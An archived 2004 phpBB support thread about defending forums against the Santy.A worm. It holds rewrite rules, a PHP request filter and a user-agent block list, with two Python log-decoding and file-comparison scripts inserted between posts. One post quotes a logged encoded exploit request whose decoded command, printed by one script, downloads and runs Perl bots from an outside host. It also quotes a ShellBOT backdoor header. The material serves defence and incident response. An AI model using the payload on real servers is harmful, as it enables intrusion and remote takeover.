Apache forbidden rule for Santy.A worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
theanimewizard
Registered User
Posts: 646
Joined: Tue Jul 08, 2003 9:24 pm

Post by theanimewizard » Sat Dec 25, 2004 12:28 am

I upgraded to 2.0.11...

and my host will be upgrading to 4.3.10 soon...

In the meantime, does the code you gave protect me from the exploit?

rcardona
Registered User
Posts: 41
Joined: Fri Mar 26, 2004 3:57 am
Location: Austin, TX, USA

Post by rcardona » Sat Dec 25, 2004 12:42 am

You are mostly safe with phpBB 2.0.11. What the rules will protect you from are generating wasted markup for bots and against the proof of concept exploit code for the PHP unserialize() memory heap exposure. I downloaded the PoC for the PHP bug, ran it against my server and came up with a rule to block it. I have not noticed anyone using the PoC code yet. The PHP bug can expose your dbuser and password and other sensitive data, so that is why you want to upgrade to PHP 2.0.11 as soon as you can.

CrazyTool
Registered User
Posts: 20
Joined: Sat Dec 25, 2004 2:13 am

Post by CrazyTool » Sat Dec 25, 2004 5:34 am

Just on the off-chance there's anyone desperately searching for a way to do this with their IIS box, just thought I'd post a link to my post about this here: http://www.phpbb.com/phpBB/viewtopic.ph ... 51#1366951

Basically a rewrite similar to that available with Apache - same flaws as pointed out with mod_rewrite (e.g. if the next worm introduces just a minor change, it won't be effective), but hey, better than nothing.

computersOC
Registered User
Posts: 2528
Joined: Thu Dec 04, 2003 6:21 am
Location: New York

Re: Apache forbidden rule for Santy.A worm

Post by computersOC » Sat Dec 25, 2004 7:29 am

rcardona wrote:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527
RewriteRule ^.*$ - [F,L]


In my ACP, instead of showing all those IPs with forums they're in, it just shows Forum Index for all of the IPs.

Phineus1
Registered User
Posts: 64
Joined: Sat Nov 08, 2003 11:55 pm

Post by Phineus1 » Sun Dec 26, 2004 5:54 am

First, thanks Master and tanrek. And though I had the robots.txt file and .htaccess files set before coming here, thanks to rcardona for putting everybody on the scent. And thanks to phpBB for coming up with quick fixes.
What might have flooded your board is the (lately) very active google- or msn-bot, don't confuse them with the worm.


Fair enough. However, what I'm seeing is much more, I'd think, than a spider crawling the system. I have a ton of stuff like this in the access logs. Fact is, I have about 300 megs of logs filled with this junk.
66.70.113.210 - - [24/Dec/2004:06:19:17 -0800] "GET /viewtopic.php?t=414&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 HTTP/1.0" 403 297 "-" "lwp-trivial/1.40"


The referers are this lwp-trivial thing, google, msn, and a couple others.
In spite of their names those worms are no living beings


The problem with viruses, of all types, is they proliferate and try to avoid detection. Perhaps not alive, but they sniff and probe. Is that the case with the most recent variant that we're all talking about here lately? I'm no expert in the field but I do know that had I allowed it to continue, whatever was going on, would've caused my server serious harm.

But let's hold this thought a moment.

Today, just now, I found in the /tmp directory a number of surprises.


In the tmp directory, are three subdirectories

.apache
.p
port


In the port directory are four files.

14568
35651
4000
65500


I'm only a hobbyist system administrator, but when I see files called bot.txt with stuff like this in it, I'm pretty sure it's a bad sign.
#!/usr/bin/perl
#
# ShellBOT - Atrix Team
#
# 0ldW0lf - oldwolf@atrix-team.org
# - www.atrix-team.org
# - www.atrix.cjb.net
#
# modified by poerschke
# irc.gigachat.net #spykids
#
################ CONFIGURATION #################################################################
my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Name of the process that will appear in ps #



I also found a log file with this in it
~Thu Dec 23 18:06:47 :(Koasa!andrei@Microzoft.users.undernet.org) (hTTP): WwW.Cool-life.org/forum/ -updated!- Pt Totzi Hackerii
~Thu Dec 23 18:06:48 :(Koasa!andrei@Microzoft.users.undernet.org) (iNFO): New forum was made by microzoft team


And 347 files like this
-rw-r--r-- 1 apache apache 4687 Dec 24 00:26 adfkgnnodfijg
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.100
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.101
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.102
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.103
...
-rw-r--r-- 1 apache apache 12943 Dec 24 00:19 index.html.3
-rw-r--r-- 1 apache apache 12943 Dec 24 00:19 index.html.4
-rw-r--r-- 1 apache apache 12943 Dec 24 00:20 index.html.5
-rw-r--r-- 1 apache apache 12943 Dec 24 00:23 index.html.6
-rw-r--r-- 1 apache apache 12943 Dec 24 00:23 index.html.7
...
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.134
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.135
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.136
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.137
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.138



My apologies, but I deleted those files. What I should have done was tar them first. I still have the stuff in the three directories... one of which contains a "make" file. What I'd really like to do is find somebody I can hand this over to (who knows what they're doing) so that we might be able to track down who's behind it, if that's possible.

--------------

Is this the same thing everybody is getting, or is this something exclusive to my particular case? I really couldn't say, but I hate coincidences like this. I do know that I was getting too many connections messages which disabled the mysql server. I checked the access logs and saw this going on, so I shut down apache and ftp... which is probably what saved the server. Am I confusing things with the Santy.A worm ? Very likely, but I don't think I'm mistaking it for very active google- or msn-bots.

And please allow me to be perfectly clear, yes, I am asking a question here. Who would know how to interpret (what's left of) this data? Who would want to or be interested in doing it. Who can be trusted? I've stopped it for now, but I think it's important to head off future attacks. Even if they may not be directly related to phpBB... because it may not be the same thing, but it's certainly trying to hide behind it.

Thanks for any info and insights.

Phineus1
Registered User
Posts: 64
Joined: Sat Nov 08, 2003 11:55 pm

Post by Phineus1 » Sun Dec 26, 2004 6:11 am

One more thought. If a program is running on my system that is contributing to this problem, then by all means let's track it down, and terminate it asap. Then, let's use the data I still have to figure out how to stop it.

tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach

Post by tanrek » Sun Dec 26, 2004 9:16 am

Your server was hacked (either by hackers or by a worm) and a backdoor was installed. Please follow the to-do-list on the previous page.
Phineus1 wrote: Is this the same thing everybody is getting


Yes. There are a lot of different worms and hackers in the wild now. Most of them try to use the highlight exploit of phpBB, but others are utilizing other PHP vulnerabilities or vulnerabilities which arise from bad programming. The numerous appearances of worms in the logfiles look frightening, but remember that hackers are still more dangerous, because they behave intelligently and thus they find security issues which worms will not find.

If your scripts are safe you can ignore those attacks. If you must reduce traffic use the rewrite directive described in this thread, but remember that this is just a workaround, because the rewrite engine of apache has not the best reputation and it might open new vulnerabilities. To obtain reduction of traffic you can also restrict search engine robots (e.g. using robots.txt), but this measure will also reduce the popularity of your forum in the search engines.
Phineus1 wrote: Who would know how to interpret (what's left of) this data?


To identify your vulnerability you first have to identify the exact time of the successful attack (e.g. timestamp of backdoor files). Then analyze your logfiles to see what exactly happened in that minute.
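
The quoted access-log line and tanrek's advice to work from the backdoor's timestamp can both be worked through with a short script. This is an added example, not code from the thread or from phpBB: it parses Apache access-log lines, undoes the two URL decodings the highlight value went through (PHP's own, then phpBB 2.0.10's extra urldecode()), turns the chr() chain back into the shell command it carries, and lists the entries logged within a minute of a given time. The log lines are constructed for the example; the first reuses the query Phineus1 quoted, which is why it shows the same 403 and lwp-trivial agent. The exec-function names other than system() are an assumption.

```python
"""Decode Santy-style viewtopic.php?highlight= requests from an Apache access
log and list what was logged around a suspected intrusion time.
Added example; the sample log lines below are constructed."""
import re
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format, reduced to the fields used below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# A chr(n).chr(n)... concatenation handed to a PHP exec-style function. The
# worm in this thread uses system(); the other three names are an assumption.
EXEC_CALL = re.compile(r"(?:system|exec|passthru|shell_exec)\(((?:chr\(\d+\)\.?)+)\)")

def apache_time(text):
    """'24/Dec/2004:06:19:17 -0800' -> timezone-aware datetime."""
    return datetime.strptime(text, "%d/%b/%Y:%H:%M:%S %z")

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = apache_time(entry["ts"])
    entry["status"] = int(entry["status"])
    return entry

def decode_highlight(target):
    """highlight as PHP puts it in $_GET (one URL decode) and as phpBB 2.0.10
    saw it after its extra urldecode(), the step that turns %2527 into a quote."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("highlight")
    if not values:
        return None, None
    return values[0], unquote(values[0])

def extract_command(php_expr):
    """Turn system(chr(99).chr(100)...) back into the shell command it runs."""
    m = EXEC_CALL.search(php_expr)
    if not m:
        return None
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", m.group(1)))

def analyze(lines):
    """Parse log lines, flag highlight injections and recover their commands."""
    entries = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        _, twice_decoded = decode_highlight(e["target"])
        # The exploit needs a quote to survive both decodings, so a quote in the
        # twice-decoded value is the indicator, however the rest is encoded.
        e["injected"] = bool(twice_decoded) and "'" in twice_decoded
        e["command"] = extract_command(twice_decoded) if e["injected"] else None
        e["blocked"] = e["status"] == 403  # 403 means the rewrite rule fired
        entries.append(e)
    return entries

def within(entries, when, seconds=60):
    """Entries logged within `seconds` of `when`; feed it the backdoor's mtime,
    e.g. datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)."""
    return [e for e in entries if abs((e["ts"] - when).total_seconds()) <= seconds]

# Constructed sample log. The first request reuses the query Phineus1 quoted
# (split only for line length); the other two are ordinary traffic.
WORM_QUERY = (
    "/viewtopic.php?t=414&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr"
    "(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr"
    "(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr"
    "(111)%252echr(109)%252echr(47)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr"
    "(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr"
    "(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr"
    "(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr"
    "(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr"
    "(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr"
    "(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527")
SAMPLE_LOG = [
    '66.70.113.210 - - [24/Dec/2004:06:19:17 -0800] "GET ' + WORM_QUERY
    + ' HTTP/1.0" 403 297 "-" "lwp-trivial/1.40"',
    '192.0.2.10 - - [24/Dec/2004:06:19:40 -0800] "GET /viewtopic.php?t=414 HTTP/1.1" '
    '200 12943 "-" "Googlebot/2.1"',
    '198.51.100.7 - - [24/Dec/2004:06:21:02 -0800] "GET /viewtopic.php?t=414&highlight=santy HTTP/1.1" '
    '200 12943 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for e in found:
        print(e["ts"], e["ip"], e["status"], "INJECTED" if e["injected"] else "-", e["command"] or "")
    # Pretend a backdoor's mtime was 06:19:30 local; pull that minute of the log.
    print([e["ip"] for e in within(found, apache_time("24/Dec/2004:06:19:30 -0800"))])
```

Run it against a real log with analyze(open(path).read().splitlines()). An injected line that got a 200 rather than a 403 is the request to investigate, and the command it carries names the files to look for: for the quoted request that is "cd /tmp;wget www.tenhaseusite.com/bot.txt;perl bot.txt;wget www.tenhaseusite.com/worm.txt;perl worm.txt", which is exactly the bot.txt and worm.txt pair Phineus1 found in /tmp.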

Phineus1
Registered User
Posts: 64
Joined: Sat Nov 08, 2003 11:55 pm

Post by Phineus1 » Sun Dec 26, 2004 9:57 am

Please follow the to-do-list on the previous page.


Do you mean this?

http://www.phpbb.com/phpBB/viewtopic.ph ... 21#1362321

tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach

Post by tanrek » Sun Dec 26, 2004 10:11 am



Yes
Checking the entire webspace for installed backdoors (suspicious files) is very laborious. I know it but I have no better advice for you. Sorry. If you have a mirror of your webspace on your local pc you can check very fast and efficiently if something has changed on your server.
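
tanrek's mirror comparison, as an added example (not code from the thread): hash every file in the local mirror and in the live webspace, list what was added, changed or removed, put anything under a dot-directory (like the .apache and .p directories found above) first, and sort the suspicious files by modification time so the earliest one gives the minute to search for in the access log. The two trees are constructed in a temporary directory so the script runs offline; on a real server point compare() at the mirror and the live document root.

```python
"""Compare a clean local mirror of the webspace against the live copy and
report what was added, changed or removed, ordered by modification time.
Added example; the fixture trees are constructed in a temp directory."""
import hashlib
import os
import tempfile
from pathlib import Path

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root):
    """{relative path: (sha256, mtime)} for every regular file, dotfiles included."""
    root = Path(root)
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink():  # may point outside the tree; inspect by hand
                continue
            out[str(p.relative_to(root))] = (sha256_of(p), p.stat().st_mtime)
    return out

def compare(mirror, live):
    a, b = snapshot(mirror), snapshot(live)
    added = sorted(set(b) - set(a))
    removed = sorted(set(a) - set(b))
    changed = sorted(k for k in set(a) & set(b) if a[k][0] != b[k][0])
    # Dot-directories such as .apache and .p from the thread are the first
    # place to look, so anything under a hidden path is listed separately.
    hidden = [k for k in added + changed if any(part.startswith(".") for part in Path(k).parts)]
    # Earliest mtime among the suspicious files approximates the intrusion time.
    timeline = sorted((b[k][1], k) for k in added + changed)
    return {"added": added, "removed": removed, "changed": changed,
            "hidden": hidden, "timeline": timeline}

def build_trees(tmp):
    """Constructed fixture: identical mirror and live, then a simulated intrusion on live."""
    mirror, live = Path(tmp) / "mirror", Path(tmp) / "live"
    originals = {"index.php": "<?php // board index\n",
                 "viewtopic.php": "<?php // topic view\n",
                 "CHANGELOG.html": "<html>changes</html>\n"}
    for root in (mirror, live):
        for rel, body in originals.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
    (live / "viewtopic.php").write_text("<?php // topic view\n// line appended on the live copy\n")
    (live / ".p").mkdir()
    (live / ".p" / "bot.txt").write_text("#!/usr/bin/perl\n# ShellBOT\n")
    (live / "CHANGELOG.html").unlink()
    return mirror, live

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        mirror, live = build_trees(tmp)
        return compare(mirror, live)

if __name__ == "__main__":
    report = demo()
    for key in ("hidden", "added", "changed", "removed"):
        print(key, report[key])
    if report["timeline"]:
        print("first suspicious mtime:", report["timeline"][0])
```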

Joe User
Registered User
Posts: 71
Joined: Mon Sep 13, 2004 9:56 am
Location: Germany
Name: Markus Kohlmeyer

Post by Joe User » Sun Dec 26, 2004 2:44 pm

Here is another variant for mod_rewrite:

RewriteEngine On
# shell commands and chr()/system() chains in the query string, and the
# double-encoded quote the highlight exploit relies on
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
# a serialized PHP string "test1" inside the cookie
RewriteCond %{HTTP_COOKIE} s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
HTH

The_Master
Registered User
Posts: 118
Joined: Fri Dec 28, 2001 2:21 am
Location: Germany

Post by The_Master » Sun Dec 26, 2004 5:20 pm

This is not meant to protect an insecure board, it will only filter some of the bot requests out.

And here is something for those of you who can't use mod_rewrite but want to cut down the amount of traffic/guests generated by the worm:

open common.php and search for:

if (!isset($HTTP_POST_VARS) && isset($_POST))
{
	$HTTP_POST_VARS = $_POST;
	$HTTP_GET_VARS = $_GET;
	$HTTP_SERVER_VARS = $_SERVER;
	$HTTP_COOKIE_VARS = $_COOKIE;
	$HTTP_ENV_VARS = $_ENV;
	$HTTP_POST_FILES = $_FILES;

	// _SESSION is the only superglobal which is conditionally set
	if (isset($_SESSION))
	{
		$HTTP_SESSION_VARS = $_SESSION;
	}
}
add this directly after it:

if ( strstr($HTTP_SERVER_VARS['HTTP_USER_AGENT'] ,'LWP') || strstr($HTTP_GET_VARS['highlight'], '%27')  )
{
	die("Hacking attempt");
}
Edit: Changed the code because there are LWP versions with a different user agent than the one I found in my apache access_log.

Edit2: This should now get every attempt to use the highlight exploit, hopefully without causing any other problems.

Edit3: Use this code instead, or change of strstr() to stristr() on the user-agent check, if you want to make it case insensitive:

$ua = isset($HTTP_SERVER_VARS['HTTP_USER_AGENT']) ? $HTTP_SERVER_VARS['HTTP_USER_AGENT'] : '';
$highlight = isset($HTTP_GET_VARS['highlight']) ? $HTTP_GET_VARS['highlight'] : '';
// LWP is the worm's user agent (checked case-insensitively); %27 is the encoded
// quote the highlight exploit still carries after PHP's own URL decoding
if ( stristr($ua, 'LWP') || strstr($highlight, '%27') )
{
	die("Hacking attempt");
}
Thanks to JKeats for informing me that the original check is case sensitive.

This is not meant to protect an insecure board, it will only filter some of the bot requests out.
Last edited by The_Master on Thu Dec 30, 2004 8:10 pm, edited 3 times in total.

usrbingeek
Registered User
Posts: 3
Joined: Sun Dec 26, 2004 5:24 pm

Post by usrbingeek » Sun Dec 26, 2004 5:28 pm

How do I combine my current .htaccess file (below) with this one?

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{HTTP_COOKIE} s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} FrontPage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^Irvine [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
Last edited by usrbingeek on Sun Dec 26, 2004 5:44 pm, edited 1 time in total.

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom » Sun Dec 26, 2004 5:33 pm

open common.php and search for:


It is worth noting that the code being searched for does NOT exist in earlier versions. I can't check my 2.0.8 install anymore (it was updated to 2.0.11), but the .2 and .6 versions contain nothing like this.

tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach

Post by tanrek » Sun Dec 26, 2004 5:36 pm

usrbingeek wrote: How do I combine my current .htaccess file (below) with this one?


All but the last RewriteCond lines (per rule) must have [OR] at the end.

Please keep in mind that the Apache Rewrite Engine should be used only as a short-term workaround, not as a lasting solution, because it could open new security issues.
Last edited by tanrek on Sun Dec 26, 2004 5:39 pm, edited 1 time in total.

The_Master
Registered User
Posts: 118
Joined: Fri Dec 28, 2001 2:21 am
Location: Germany

Post by The_Master » Sun Dec 26, 2004 5:38 pm

espicom wrote:
open common.php and search for:


It is worth noting that the code being searched for does NOT exist in earlier versions. I can't check my 2.0.8 install anymore (it was updated to 2.0.11), but the .2 and .6 versions contain nothing like this.


First read, then think! I wrote that it is meant to cut down the traffic and number of guests, not to protect you against anything. So you should upgrade first. I don't support people running outdated versions.
